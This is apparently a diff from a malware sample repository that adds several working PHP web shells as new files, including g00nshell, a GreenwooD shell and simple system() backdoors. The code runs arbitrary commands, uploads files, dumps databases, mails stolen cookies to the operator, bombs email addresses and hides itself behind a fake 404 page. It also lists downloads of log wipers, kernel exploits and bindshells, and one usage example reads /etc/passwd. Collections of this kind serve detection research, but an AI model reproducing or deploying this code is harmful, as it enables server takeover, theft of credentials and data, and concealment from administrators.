+ array("pipe", "r"),1 => array("pipe", "w"),2 => array("pipe", "w"),)){ + $process = @proc_open("$what",$descpec,$pipes); + if (is_resource($process)) { + fwrite($pipes[0], ""); + fclose($pipes[0]); + + while(!feof($pipes[2])) { + $erro_retorno = fgets($pipes[2], 4096); + if(!empty($erro_retorno)) echo $erro_retorno;//isso mostra tds os erros + } + fclose($pipes[2]); + + while(!feof($pipes[1])) { + echo fgets($pipes[1], 4096); + } + fclose($pipes[1]); + + $ok_p_fecha = @proc_close($process); + }else echo "It seems that this PHP version (".phpversion().") doesn't support proc_open() function"; +}else echo "This PHP version ($pro7) doesn't have the proc_open() or this function is disabled by php.ini"; +} + +$funE="function_exists"; +if($safe){$fe="safemode";$feshow=$fe;} +elseif($funE('shell_exec')){$fe="shell";$feshow="shell_exec";} +elseif($funE('passthru')){$fe="passthru";$feshow=$fe;} +elseif($funE('system')){$fe="system";$feshow=$fe;} +elseif($funE('exec')){$fe="execc";$feshow="exec";} +elseif($funE('popen')){$fe="popenn";$feshow="popen";} +elseif($funE('proc_open')){$fe="procc";$feshow="proc_open";} +else {$fe="nofunction";$feshow=$fe;} +if($fu!="0" or !empty($fu)){ + if($fu==1){$fe="passthru";$feshow=$fe;} + if($fu==2){$fe="system";$feshow=$fe;} + if($fu==3){$fe="execc";$feshow="exec";} + if($fu==4){$fe="popenn";$feshow="popen";} + if($fu==5){$fe="shell";$feshow="shell_exec";} + if($fu==6){$fe="procc";$feshow="proc_open";} +} +$fe("$cmd 2>&1"); +$output=ob_get_contents();ob_end_clean(); +?> +

+ +

stdOut from $cmdShow\", using $feshow()";?>
+
r3v3ng4ns +//-> there's no patch for the stupidity of mankind +--> +X11 at /usr/X11R6/, ";//procura a pasta do x11 +if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="xterm at /usr/X11R6/bin/xterm, ";//procura o xterm +if (@file_exists("/usr/bin/nc")) $pro2="nc at /usr/bin/nc, ";//procura o netcat +if (@file_exists("/usr/bin/wget")) $pro3="wget at /usr/bin/wget, ";//procura o wget +if (@file_exists("/usr/bin/lynx")) $pro4="lynx at /usr/bin/lynx, ";//procura o lynx +if (@file_exists("/usr/bin/gcc")) $pro5="gcc at /usr/bin/gcc, ";//procura o gcc +if (@file_exists("/usr/bin/cc")) $pro6="cc at /usr/bin/cc ";//procura o cc +$pro=$pro0.$pro1.$pro2.$pro3.$pro4.$pro5.$pro6;//junta tudo numa variavel + +$ip=@gethostbyname($_SERVER['HTTP_HOST']);//mostra o ip do usuario + +//arqui, se a $cmd tiver o comando 'ls', adiciona-se o parametro '-F' aa 'ls', deixando +//'ls -F', mas procura-se manter os outros parametros que o usuario deixou para o ls. +//par isso definiu o $cmdshow lah em cima, isso aqui o usuario nao sabe. o parametro +//'-F' no ls facilita a visualizacao dos arquivos. +if(strpos($cmd, 'ls --') !==false){ $cmd = str_replace('ls --', 'ls -F --', $cmd);} +else if(strpos($cmd, 'ls -') !==false){ $cmd = str_replace('ls -', 'ls -F', $cmd);} +else if(strpos($cmd, ';ls') !==false){ $cmd = str_replace(';ls', ';ls -F', $cmd);} +else if(strpos($cmd, '; ls') !==false){ $cmd = str_replace('; ls', ';ls -F', $cmd);} +else if($cmd=='ls'){$cmd = "ls -F";} + +//se houverem '//' no $chdir, aki sao removidas +if(strpos($chdir, '//') !==false) $chdir = str_replace('//', '/', $chdir); +?> + + + + + + + + + +
[ Defacing Tool Pro v ] ?
+by r3v3ng4ns - revengans@hotmail.com +
+ + + + + + + + +
:
user: uid() euid() gid()
write permission:YES"; }else{ echo " no"; } ?>
server info:
pro info: ip
original path:
current path: +
+
+ +
command
+
+&1') +$fe("$cmd 2>&1"); +$output=ob_get_contents();ob_end_clean(); +?> +
+

stdOut from $cmdshow\", using $feshow()";?>
+
diff --git a/PHP/Backdoor.PHP.WebShell.u b/PHP/Backdoor.PHP.WebShell.u new file mode 100644 index 00000000..6238d4c4 --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.u @@ -0,0 +1,103 @@ +-:[GreenwooD]:- WinX Shell + +"; +print ""; +print "You:" ; +print " ".$_SERVER['REMOTE_ADDR']." [".$host."] " ; +print ""; +print ""; +print "Version OS:" ; +print " $veros "; +print ""; +print ""; +print "Server:"; +print "".$_SERVER['SERVER_SIGNATURE'].""; +print ""; +print ""; +print "Win Dir:"; +print " $windir "; +print ""; +print ""; +print "
"; + +//------- [netstat -an] and [ipconfig] and [tasklist] ------------ +print "
"; +print ""; +print "   "; +print ""; +print "   "; +print ""; +print "
"; +//------------------------------- + + +//------------------------------- + +print ""; +print "
"; + +//------------------------------- + +print "
"; +print "CMD: "; +print "
"; +print ""; +print " "; +print "
"; + +//------------------------------- + +print "
"; +print "Upload:"; +print "
"; +print ""; +print "File: "; +print " Filename on server: "; +print" "; +print"
"; + +?> + + + + + +
Created by -:[GreenwooD]:-
+ \ No newline at end of file diff --git a/PHP/Backdoor.PHP.WebShell.w b/PHP/Backdoor.PHP.WebShell.w new file mode 100644 index 00000000..38c6badf --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.w @@ -0,0 +1,730 @@ +document.location.href= # +#'http://site.com/shl.php?cookie='+document.cookies # +##########################VERIFICATION LEVELS######################### +#0: No protection; anyone can access # +#1: User-Agent required # +#2: Require IP # +#3: Basic Authentication # +##############################KNOWN BUGS############################## +#Windows directory handling # +# # +#The SQL tool is NOT complete. There is currently no editing function# +#available. Some time in the future this may be fixed, but for now # +#don't complain to me about it # +################################SHOUTS################################ +#pr0be - Beta testing & CSS # +#TrinTiTTY - Beta testing # +#clorox - Beta testing # +#Everyone else at g00ns.net # +########################NOTE TO ADMINISTRATORS######################## +#If this script has been found on your server without your approval, # +#it would probably be wise to delete it and check your logs. # +###################################################################### +*/ + +// Configuration +$auth = 0; +$uakey = "b5c3d0b28619de70bf5588505f4061f2"; // MD5 encoded user-agent +$IP = array("127.0.0.2","127.0.0.1"); // IP Addresses allowed to access shell +$email = ""; // E-mail address where cookies will be sent +$user = "af1035a85447f5aa9d21570d884b723a"; // MD5 encoded User +$pass = "47e331d2b8d07465515c50cb0fad1e5a"; // MD5 encoded Password + +// Global Variables +$version = "1.3 final"; +$self = $_SERVER['PHP_SELF']; +$soft = $_SERVER["SERVER_SOFTWARE"]; +$servinf = split("[:]", getenv('HTTP_HOST')); +$servip = $servinf[0]; +$servport = $servinf[1]; +$uname = php_uname(); +$curuser = @exec('whoami'); +$cmd = $_GET['cmd']; +$act = $_GET['act']; +$cmd = $_GET['cmd']; +$cookie = $_GET['cookie']; +$f = $_GET['f']; +$curdir = cleandir(getcwd()); +if(!$dir){$dir = $_GET['dir'];} +elseif($dir && $_SESSION['dir']){$dir = $_SESSION['dir'];} +elseif($dir && $_SESSION['dir']){$dir = $curdir;} +if($dir && $dir != "nullz"){$dir = cleandir($dir);} +$contents = $_POST['contents']; +$gf = $_POST['gf']; +$img = $_GET['img']; +session_start(); +@set_time_limit(5); +switch($auth){ // Authentication switcher + case 0: break; + case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey){hide();} break; + case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)){hide();} break; + case 3: if(!$_SERVER["PHP_AUTH_USER"]){userauth();} break; +} + +function userauth(){ // Basic authentication function + global $user, $pass; + header("WWW-Authenticate: Basic realm='Secure Area'"); + if(md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"] != $pass)){ + hide(); + die(); + } +} + +if(!$act && !$cmd && !$cookie && !$f && !$dir && !$gf && !$img){main();} +elseif(!$act && $cmd){ + style(); + echo("Results:\n
"); +} +elseif($cookie){@mail("$email", "Cookie Data", "$cookie", "From: $email"); hide();} // Cookie stealer function +elseif($act == "view" && $f && $dir){view($f, $dir);} +elseif($img){img($img);} +elseif($gf){grab($gf);} +elseif($dir){files($dir);} +else{ + switch($act){ + case "phpinfo": phpinfo();break; + case "sql": sql();break; + case "files": files($dir);break; + case "email": email();break; + case "cmd": cmd();break; + case "upload": upload();break; + case "tools": tools();break; + case "sqllogin": sqllogin();break; + case "sql": sql();break; + case "lookup": lookup();break; + case "kill": kill();break; + case "phpexec": execphp();break; + default: main();break; + } +} + +function cleandir($d){ // Function to clean up the $dir and $curdir variables + $d = realpath($d); + $d = str_replace("\\\\", "//", $d); + $d = str_replace("////", "//", $d); + $d = str_replace("\\", "/", $d); + return($d); +} + + + +function hide(){ // Hiding function + global $self, $soft, $servip, $servport; +die(" + +404 Not Found + +

Not Found

+The requested URL $self was not found on this server.

+

Additionally, a 404 Not Found +error was encountered while trying to use an ErrorDocument to handle the request. +


+
$soft Server at $servip Port $servport
+"); +} + +function style(){ // Style / header function + global $servip,$version; + echo("\n + \n + g00nshell v" . $version . " - " . $servip . "\n + \n + \n"); +} + +function main(){ // Main/menu function + global $self, $servip, $servport, $uname, $soft, $banner, $curuser, $version; + style(); + $act = array('cmd'=>'Command Execute','files'=>'File View','phpinfo'=>'PHP info', 'phpexec'=>'PHP Execute', + 'tools'=>'Tools','sqllogin'=>'SQL','email'=>'Email','upload'=>'Get Files','lookup'=>'List Domains','bshell'=>'Bindshell','kill'=>'Kill Shell'); + $capt = array_flip($act); + echo("
"); + echo("Host: " . $servip . "
"); + echo("Server software: " . $soft . "
"); + echo("Uname: " . $uname . "
"); + echo("Shell Directory: " . getcwd() . "
"); + echo(""); + echo("[ More ] "); + echo("[ Less ]"); + echo("
"); + echo("

Links

"); + if($_SERVER['QUERY_STRING']){foreach($act as $link){echo("[ " . $link . " ] ");}} + else{foreach($act as $link){echo("[ " . $link . " ] ");}} + echo("
"); + echo("
"); + echo("
"); + echo("
:: g00nshell v" . $version . " ::
"); + die(); +} + +function cmd(){ // Command execution function + style(); + echo(""); + echo("Command:
"); + echo(" "); + echo("
\n"); + echo("\n"); + echo("
\n"); + if($_POST['cmd'] != ""){$x = $_POST['cmd'];} + elseif($_POST['precmd'] != ""){$x = $_POST['precmd'];} + else{die();} + echo("Results:
"); +} + +function execphp(){ // PHP code execution function + style(); + echo("

Execute PHP Code

"); + echo("
"); + echo("\n
\n"); + echo(""); + echo("
"); + if($_POST['phpexec']){ + echo(""); + } +} + +function sqllogin(){ // MySQL login function + session_start(); + if($_SESSION['isloggedin'] == "true"){ + header("Location: ?act=sql"); + } + style(); + echo("
"); + echo("User:

\n"); + echo("Password:

\n"); + echo("Host:

\n"); + echo("Port:

\n"); + echo(""); + echo("
"); + die(); +} + +function sql(){ // General SQL Function + session_start(); + if(!$_GET['sqlf']){style();} + if($_POST['un'] && $_POST['pw']){; + $_SESSION['sql_user'] = $_POST['un']; + $_SESSION['sql_password'] = $_POST['pw']; + } + if($_POST['host']){$_SESSION['sql_host'] = $_POST['host'];} + else{$_SESSION['sql_host'] = 'localhost';} + if($_POST['port']){$_SESSION['sql_port'] = $_POST['port'];} + else{$_SESSION['sql_port'] = '3306';} + + if($_SESSION['sql_user'] && $_SESSION['sql_password']){ + if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))){ + unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']); + echo("Invalid credentials
\n"); + die(sqllogin()); + } + else{ + $_SESSION['isloggedin'] = "true"; + } + } + else{ + die(sqllogin()); + } + + if ($_GET['db']){ + mysql_select_db($_GET['db'], $sqlcon); + if($_GET['sqlquery']){ + $dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error()); + $num = mysql_num_rows($dat); + for($i=0;$i<$num;$i++){ + echo(mysql_result($dat, $i) . "
\n"); + } + } + else if($_GET['table'] && !$_GET['sqlf']){ + echo("Insert Row

\n"); + echo(""); + $query = "SHOW COLUMNS FROM " . $_GET['table']; + $result = mysql_query($query, $sqlcon) or die(mysql_error()); + $i = 0; + $fields = array(); + while($row = mysql_fetch_assoc($result)){ + array_push($fields, $row['Field']); + echo(""); + for($i=0;$i" . $row[0] . ""); + } + } + echo("\n"); + } + } + $y++; + } + echo("
" . $fields[$i]); + $i++; + } + $result = mysql_query("Select * FROM " . $_GET['table'], $sqlcon) or die(mysql_error()); + $num_rows = mysql_num_rows($result) or die(mysql_error()); + $y=0; + for($x=1;$x<=$num_rows+1;$x++){ + if(!$_GET['p']){ + $_GET['p'] = 1; + } + if($_GET['p']){ + if($y > (30*($_GET['p']-1)) && $y <= 30*($_GET['p'])){ + echo("
\n"); + for($z=1;$z<=ceil($num_rows / 30);$z++){ + echo("" . $z . " | "); + } + } + elseif($_GET['table'] && $_GET['sqlf']){ + switch($_GET['sqlf']){ + case "dl": sqldownload();break; + case "ins": sqlinsert();break; + default: $_GET['sqlf'] = ""; + } + } + else{ + echo(""); + $query = "SHOW TABLES FROM " . $_GET['db']; + $dat = mysql_query($query, $sqlcon) or die(mysql_error()); + while ($row = mysql_fetch_row($dat)){ + echo("\n"); + } + echo("
" . $row[0] . "[Download]
"); + } + } + else{ + $dbs=mysql_list_dbs($sqlcon); + while($row = mysql_fetch_object($dbs)) { + echo("" . $row->Database . "
\n"); + } + } + mysql_close($sqlcon); +} + +function sqldownload(){ // Download sql file function + @ob_flush; + $sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']); + mysql_select_db($_GET['db'], $sqlcon); + $query = "SHOW COLUMNS FROM " . $_GET['table']; + $result = mysql_query($query, $sqlcon) or die(mysql_error()); + $fields = array(); + while($row = mysql_fetch_assoc($result)){ + array_push($fields, $row['Field']); + $i++; + } + $result = mysql_query("Select * FROM " . $_GET['table'], $sqlcon) or die(mysql_error()); + $num_rows = mysql_num_rows($result) or die(mysql_error()); + for($x=1;$x<$num_rows;$x++){ + $out .= "("; + for($i=0;$i\nGo back"); + } + $query = "SHOW COLUMNS FROM " . $_GET['table']; + $result = mysql_query($query, $sqlcon) or die(mysql_error()); + $i = 0; + $fields = array(); + echo("
"); + echo(""); + while($row = mysql_fetch_assoc($result)){ + array_push($fields, $row['Field']); + echo("
" . $fields[$i] . "
\n"); + $i++; + } + echo("
"); + echo("
\n"); + echo("
"); +} + +function nicesize($size){ + if(!$size){return false;} + if ($size >= 1073741824){return(round($size / 1073741824) . " GB");} + elseif ($size >= 1048576){return(round($size / 1048576) . " MB");} + elseif ($size >= 1024){return(round($size / 1024) . " KB");} + else{return($size . " B");} +} + +function files($dir){ // File manipulator function + style(); + global $self, $curdir; + if($dir==""){$dir = $curdir;} + $dirx = explode("/", $dir); + $files = array(); + $folders = array(); + echo("
"); + echo(""); + echo(""); + echo("
"); + echo("

File list for "); + for($i=0;$i$dirx[$i]" . "/"); + } + echo("

"); + echo(""); + echo(""); + if ($handle = opendir($dir)) { + while (false != ($link = readdir($handle))) { + if (is_dir($dir . '/' . $link)){ + $file = array(); + if(is_writable($dir . '/' . $link)){$file['perm']='write';} + elseif(is_readable($dir . '/' . $link)){$file['perm']='read';} + else{$file['perm']='none';} + switch($file['perm']){ + case "write": @$file['link'] = "$link"; break; + case "read": @$file['link'] = "$link"; break; + case "none": @$file['link'] = "$link"; break; + default: @$file['link'] = "$link"; break; + } + @$file['icon'] = "folder"; + if($_SERVER['QUERY_STRING']){$folder = " " . $file['link'];} + else{$folder = " " . $file['link'];} + array_push($folders, $folder); + } + else{ + $file = array(); + $ext = strtolower(end(explode(".", $link))); + if(!$file['size'] = nicesize(@filesize($dir . '/' . $link))){ + $file['size'] = "0B"; + } + if(is_writable($dir . '/' . $link)){$file['perm']='write';} + elseif(is_readable($dir . '/' . $link)){$file['perm']='read';} + else{$file['perm']='none';} + switch($file['perm']){ + case "write": @$file['link'] = "$link"; break; + case "read": @$file['link'] = "$link"; break; + case "none": @$file['link'] = "$link"; break; + default: @$file['link'] = "$link"; break; + } + switch($ext){ + case "exe": case "com": case "jar": case "": $file['icon']="binary"; break; + case "jpg": case "gif": case "png": case "bmp": $file['icon']="image"; break; + case "zip": case "tar": case "rar": case "gz": case "cab": case "bz2": case "gzip": $file['icon']="compressed"; break; + case "txt": case "doc": case "pdf": case "htm": case "html": case "rtf": $file['icon']="text"; break; + case "wav": case "mp3": case "mp4": case "wma": $file['icon']="sound"; break; + case "js": case "vbs": case "c": case "h": case "sh": case "pl": case "py": case "php": case "h": $file['icon']="script"; break; + default: $file['icon'] = "unknown"; break; + } + if($_SERVER['QUERY_STRING']){$file = "\n";} + else{$file = "\n";} + array_push($files, $file); + } + } + foreach($folders as $folder){echo("\n");} + foreach($files as $file){echo($file);} + echo("
File NameFile Size
" . $file['link'] . "" . $file['size'] . "
" . $file['link'] . "" . $file['size'] . "
$folderDIR
"); + closedir($handle); + } +} + +function email(){ // Email bomber function + $times = $_POST['times']; + $to = $_POST['to']; + $subject = $_POST['subject']; + $body = $_POST['body']; + $from = $_POST['from']; + + style(); + echo("

Mail Bomber

+
+ Your address:
+
+ Their address:
+
+ Subject:
+
+ Text:
+
+ How many times:
+

+ +
"); + if ($to && $from){for($i=0;$i<$times;$i++){mail("$to", "$subject", "$body", "From: $from");}} +} + +function view($filename, $dir){ // File view function + if($_POST['fileact'] == "Download"){ + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($_POST['contents'])); + header("Content-disposition: attachment; filename=" . basename($filename) . ";"); + $handle = fopen($filename, "r"); + echo(fread($handle, filesize($filename))); + die(); + } + style(); + if($_POST['contents'] && $_POST['fileact'] == "Save"){ + $handle = fopen($filename, 'w'); + fwrite($handle, stripslashes($_POST['contents'])); + fclose($handle); + echo("Saved file.

"); + echo("Go back"); + die(); + } + elseif($_POST['fileact'] == "Delete"){ + unlink($filename); + echo("Deleted file.

"); + echo("Go back"); + die(); + } + + if($dir != "nullz"){ // heh + $filename = $dir."/".$filename; + } + $bad = array("<", ">"); + $good = array("<", ">"); + $file = fopen($filename, 'r'); + $content = fread($file, @filesize($filename)); + echo("
"); + echo(""); + echo(""); + echo(""); + echo(""); + echo("
"); +} + +function edit($file, $contents){ // File edit function + style(); + $handle = fopen($file, 'w'); + fwrite($handle, $contents); + fclose($handle); + echo("Saved file.

"); + echo("Go back"); +} + +function upload(){ // Uploading frontend function + global $curdir; + style(); + echo("
+ Output Directory
+

+ Remote Upload
+ +

+ Local File Upload
+ + +

"); + + if($_POST['rem']){grab($_POST['rem']);} + if($_FILES['up']){up($_FILES['up']);} +} + +function up($up){ // Uploading backend function + style(); + $updir = $_POST['loc']; + move_uploaded_file($up["tmp_name"], $updir . "/" . $up["name"]); + die("File has been uploaded."); +} + +function grab($file){ // Uploading backend function + style(); + $updir = $_POST['loc']; + $filex = array_pop(explode("/", $file)); + if(exec("wget $file -b -O $updir/$filex")){die("File has been uploaded.");} + else{die("File upload failed.");} +} + +function tools(){ // Useful tools function + global $curdir; + style(); + $tools = array( + "--- Log wipers ---"=>"1", + "Vanish2.tgz"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/vanish2.tgz", + "Cloak.c"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/cloak.c", + "gh0st.sh"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/gh0st.sh", + "--- Priv Escalation ---"=>"2", + "h00lyshit - Linux 2.6 ALL"=>"http://someshit.net/files/xpl/h00lyshit", + "k-rad3 - Linux <= 2.6.11"=>"http://someshit.net/files/xpl/krad3", + "raptor - Linux <= 2.6.17.4"=>"http://someshit.net/files/xpl/raptor", + "rootbsd - BSD v?"=>"http://someshit.net/files/xpl/rootbsd", + "--- Bindshells ---"=>"3", + "THC rwwwshell-1.6.perl"=>"http://packetstormsecurity.org/groups/thc/rwwwshell-1.6.perl", + "Basic Perl bindshell"=>"http://packetstormsecurity.org/groups/synnergy/bindshell-unix", + "--- Misc ---"=>"4", + "MOCKS SOCKS4 Proxy"=>"http://superb-east.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz", + "xps.c (proc hider)"=>"http://packetstormsecurity.org/groups/shadowpenguin/unix-tools/xps.c"); + $names = array_flip($tools); + echo("Tools:"); + echo("
"); + echo("Output Directory
"); + echo("

"); + echo(""); + echo("
"); + echo("
"); +} + +function lookup(){ // Domain lookup function + style(); + global $servinf; + $script = "import urllib, urllib2, sys, re + req = urllib2.Request('http://www.seologs.com/ip-domains.html', urllib.urlencode({'domainname' : sys.argv[1]})) + site = re.findall('.+\) (.+)
', urllib2.urlopen(req).read()) + for i in xrange(0,len(site)): + print site[i]"; // My sexy python script + $handle = fopen('lookup.py', 'w'); + fwrite($handle, $script); + fclose($handle); + echo("

Domains

"); + echo("
    "); + $cmd = exec("python lookup.py " . $servinf[0], $ret); + foreach($ret as $site){echo("
  • " . $site . "\n");} + unlink('lookup.py'); +} + + +function img($img){ // Images function + $images = array( + "folder"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAA" . + "gALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwq" . + "d1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", + "image"=>"R0lGODlhFAAWAOMAAP////8zM8z//8zMzJmZmWZmZmYAADMzMwCZzACZMwAzZgAAAAAAAAAAAAAAAAAAACH+TlRoaX" . + "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" . + "ZXIgMTk5NQAh+QQBAAACACwAAAAAFAAWAAAEkPDISae4WBzAu99Hdm1eSYYZWXYqOgJBLAcDoNrYNssGsBy/4GsX6y" . + "2OyMWQ2OMQngSlBjZLWBM1AFSqkyU4A2tWywUMYt/wlTSIvgYGA/Zq3QwU7mmHvh4g8GUsfAUHCH95NwMHV4SGh4Ed" . + "ihOOjy8rZpSVeiV+mYCWHncKo6Sfm5cliAdQrK1PQBlJsrNSEQA7", + "unknown"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . + "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" . + "AAADaDi6vPEwDECrnSO+aTvPEQcIAmGaIrhR5XmKgMq1LkoMN7ECrjDWp52r0iPpJJ0KjUAq7SxLE+sI+9V8vycFiM" . + "0iLb2O80s8JcfVJJTaGYrZYPNby5Ov6WolPD+XDJqAgSQ4EUCGQQEJADs=", + "binary"=>"R0lGODlhFAAWAMIAAP///8z//8zMzJmZmTMzMwAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . + "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" . + "AAADaUi6vPEwEECrnSS+WQoQXSEAE6lxXgeopQmha+q1rhTfakHo/HaDnVFo6LMYKYPkoOADim4VJdOWkx2XvirUgq" . + "VaVcbuxCn0hKe04znrIV/ROOvaG3+z63OYO6/uiwlKgYJJOxFDh4hTCQA7", + "text"=>"R0lGODlhFAAWAOMAAP/////MM/8zM8z//5mZmZlmM2bM/zMzMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH+TlRoaX" . + "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" . + "ZXIgMTk5NQAh+QQBAAADACwAAAAAFAAWAAAEb/DISee4eBzAu99Hdm1eSYbZWXEkgI5sEBg0+2HnTBsccvhAmGtXAy" . + "COSITwUGg2PYQoQalhOZ/QKLVV6gKmQm8XXDUmzx0yV5ze9s7JdpgtL3ME5jhHTS/xO3hwdWt0f317WwdSi4xRPxlw" . + "kUgXEQA7", + "compressed"=>"R0lGODlhFAAWAOcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM//MAP+Z//+ZzP+Zmf+ZZv+ZM/+ZAP" . + "9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8AZv8AM/8AAMz//8z/zMz/mcz/Zsz/" . + "M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZM8yZAMxm/8xmzMxmmcxmZsxmM8xmAMwz/8wzzMwzmc" . + "wzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wAAJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZpnMM5nMAJmZ/5mZ" . + "zJmZmZmZZpmZM5mZAJlm/5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJkAmZkAZpkAM5kAAG" . + "b//2b/zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/2ZmzGZmmWZmZmZm" . + "M2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ZjP/MzP/ADPM/zPMzDPMmT" . + "PMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNmMzNmADMz/zMzzDMzmTMzZjMzMzMzADMA/zMA" . + "zDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzACZmQCZZgCZMwCZAA" . + "Bm/wBmzABmmQBmZgBmMwBmAAAz/wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAM+4AAN0AALsAAKoAAIgAAHcA" . + "AFUAAEQAACIAABEAAADuAADdAAC7AACqAACIAAB3AABVAABEAAAiAAARAAAA7gAA3QAAuwAAqgAAiAAAdwAAVQAARA" . + "AAIgAAEe7u7t3d3bu7u6qqqoiIiHd3d1VVVURERCIiIhEREQAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMg" . + "ZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAAkACwAAAAAFA" . + "AWAAAImQBJCCTBqmDBgQgTDmQFAABDVgojEmzI0KHEhBUrWrwoMGNDihwnAvjHiqRJjhX/qVz5D+VHAFZiWmmZ8BGH" . + "ji9hxqTJ4ZFAmzc1vpxJgkPPn0Y5CP04M6lPEkCN5mxoJelRqFY5TM36NGrPqV67Op0KM6rYnkup/gMq1mdamC1tdn" . + "36lijUpwjr0pSoFyUrmTJLhiTBkqXCgAA7", + "sound"=>"R0lGODlhFAAWAMIAAP////8zM8z//8zMzJmZmWYAADMzMwAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . + "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAACACwAAAAAFAAW" . + "AAADayi63P4wNsNCkOocYVWPB7FxFwmFwGh+DZpynndpNAHcW9cVQUj8tttrd+G5hMINT7A0BpE4ZnF6hCqn0iryKs" . + "0SDN9v0tSc0Q4DQ1SHFRjeBrQ6FzNN5Co2JD4YfUp7GnYsexQLhBiJigsJADs=", + "script"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . + "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" . + "AAADZTi6vPEwDECrnSO+aTvPEddVIrhVBJCSF8QRMIwOBE2fVLrmcYz3O4pgKCDgVMgR0SgZOYVM0dNS/AF7gGy1me" . + "16v9vXNdYNf89es2os00bRcDW7DVDDwe87fjMg+v9DNxBzYw8JADs="); + header('Content-type: image/gif'); + echo base64_decode($images[$img]); + die(); +} + +function kill(){ // Shell deleter function + style(); + echo("
    "); + echo("Type 'confirm' to kill the shell:
    \n"); + echo(""); + echo("
    "); + if($_POST['ver'] == "confirm"){ + $self = basename($_SERVER['PHP_SELF']); + if(unlink($self)){echo("Deleted");} + else{echo("Failed");} + } +} +die(); +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.WebShell.y b/PHP/Backdoor.PHP.WebShell.y new file mode 100644 index 00000000..9fe6001b --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.y @@ -0,0 +1,18 @@ + + +G-Security Webshell + + + +
    +
    + +
    +
    +
    +
    +
    +
    + + + +"; + $cmd = ($_REQUEST['cmd']); + system($cmd); + echo ""; + die; +} + +?> + +Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd + + diff --git a/PHP/Backdoor.PHP.Zonie b/PHP/Backdoor.PHP.Zonie new file mode 100644 index 00000000..3d364f4b --- /dev/null +++ b/PHP/Backdoor.PHP.Zonie @@ -0,0 +1,71 @@ +"; + if ($handle = opendir("$d")) { + echo "

    listing of $d

    "; + while ($dir = readdir($handle)){ + if (is_dir("$d/$dir")) echo ""; + else echo ""; + echo "$dir\n"; + echo ""; + } + + } else echo "opendir() failed"; + closedir($handle); + die ("
    "); +} +if(isset($_REQUEST['c'])){ + echo "
    ";
    +	system($_REQUEST['c']);		   
    +	die;
    +}
    +if(isset($_REQUEST['upload'])){
    +
    +		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
